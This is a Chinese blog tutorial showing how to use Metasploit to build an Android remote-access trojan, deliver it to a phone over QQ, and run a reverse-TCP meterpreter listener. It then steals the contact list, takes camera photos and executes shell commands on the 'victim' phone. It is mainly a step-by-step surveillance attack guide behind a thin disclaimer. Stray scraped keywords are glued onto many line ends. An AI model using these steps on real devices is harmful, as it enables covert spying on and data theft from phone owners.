來源:https://blog.csdn.net/
前言
嚴正聲明:本文僅限於技術討論與分享,嚴禁用於非法途徑。android
本文目的:演示如何藉助Kali Linux系統的Metasploit滲透測試框架生成遠程控制木馬,而後感染局域網內的Android手機,從而實現對受害者手機數據的讀取、音頻的竊聽、位置的獲取、軟件安裝或卸載等。web
環境說明shell
機器 | IP地址 |
---|---|
Win10 物理主機 | 192.168.0.105 |
Kali 虛擬機 | 192.168.0.199 |
honor 8 測試手機 | 192.168.0.107 |
Win10主機和手機應鏈接同一個WIFI,Kali虛擬機安裝在VMware中,使用橋接模式使得可配置其IP地址跟物理主機、手機在同一個網段之中,造成一個小局域網。安全
攻擊準備微信
木馬生成
一、先說點廢話,來確認下 Kali 虛擬機配置好的IP地址:app
二、在 Kali 終端輸入如下命令在 Kali 虛擬機/root
路徑下生成木馬文件520.apk
:框架
傳輸木馬
遠控木馬文件已經生成了,但如何從 Kali 虛擬機傳輸到 Win10 物理主機並進一步傳輸到受害者手機呢?tcp
一、使用Xshell遠程鏈接工具,新建以下SFTP協議的文件傳輸會話:
工具
二、同時配置好與遠程 Kali 主機對接的本地文件夾,用於 Win 10 主機傳輸文件的默認存放路徑:學習
三、輸入 kali 主機的帳戶和密碼進行登錄併成功鏈接後,使用命令get 520.apk
從Kali 主機下載木馬文件到本地文件夾D:\Code
下:
四、在 Win 10 主機本地文件夾確認下文件是否下載成功:
安裝木馬
一、再廢話一下,查看並確認華爲測試手機的IP地址與 Kali 虛擬機、Win 10主機在同一網段內:
二、在 Kali 虛擬機裏查看可否連通手機(這是後續攻擊成功的基礎):
三、在 Win 10 主機打開QQ程序,向華爲手機發送木馬文件並安裝(這個就不用演示了吧…),安裝後以下:
開始攻擊
MSF監聽
Kali 終端依次執行如下命令:
1
2
3
4
5
6
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.0.199 //這裏的地址設置成咱們剛纔生成木馬的IP地址
set lport 9999 //這裏的端口設置成剛纔咱們生成木馬所監聽的端口
exploit //開始執行漏洞,開始監聽,等待手機上線
一、在 Kali 終端輸入msfconsole
命令啓動Metasploit
框架:
二、依次如下執行命令加載攻擊模塊、選擇Payload、設置本地監聽主機的IP和端口:
三、執行命令exploit
,開始執行攻擊程序,進入監聽狀態,等待目標手機上線(用戶點擊木馬程序):
四、此時手動點擊剛纔手機中安裝的MainActivity
程序圖標(沒有界面),則可成功創建攻擊會話:
五、此時輸入help
命令可查看具體的攻擊命令和描述,後面將選擇幾個進行演示:
命令行執行
成功創建攻擊會話後能夠對受害者手機進行像Linux主機shell同樣對手機進行命令執行操做:
通信錄下載
一、在攻擊會話中執行dump_contacts
命令導出受害者手機通信錄裏的信息到 Kali 虛擬機/root
路徑下:
二、在虛擬機中查看一下導出來的通信錄文件:
三、同理可導出受害者手機中的短信記錄、通話記錄……可是此手機沒有插手機卡(窮……),故此處不作演示了。
攝像機拍攝
在攻擊會話中執行命令webcam_snap
,可開啓受害者的攝像頭自動拍攝一張照片並保存到Kali 虛擬機中:
同理還能夠非法調用受害者手機的錄音功能、屏幕截圖功能……
至此,本次Kali系統生成遠控木馬後攻擊局域網內Android手機的演示結束,其餘攻擊操做讀者有興趣的話可自行藉助help
命令給出的攻擊命令描述進行體驗。
舒適提醒:這次演示中的木馬程序沒有圖形化界面的假裝,真實的環境中攻擊者會將其假裝得跟正常軟件同樣,這提醒了咱們不要輕易安裝安全性未知的軟件,同時不要輕易鏈接公共WIFI,讓本身的設備暴露在攻擊者搭建的局域網下……
學習更多黑客技能!體驗靶場實戰練習
(黑客視頻資料及工具)

往期內容回顧

本文分享自微信公衆號 - 暗網黑客(HackRead)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。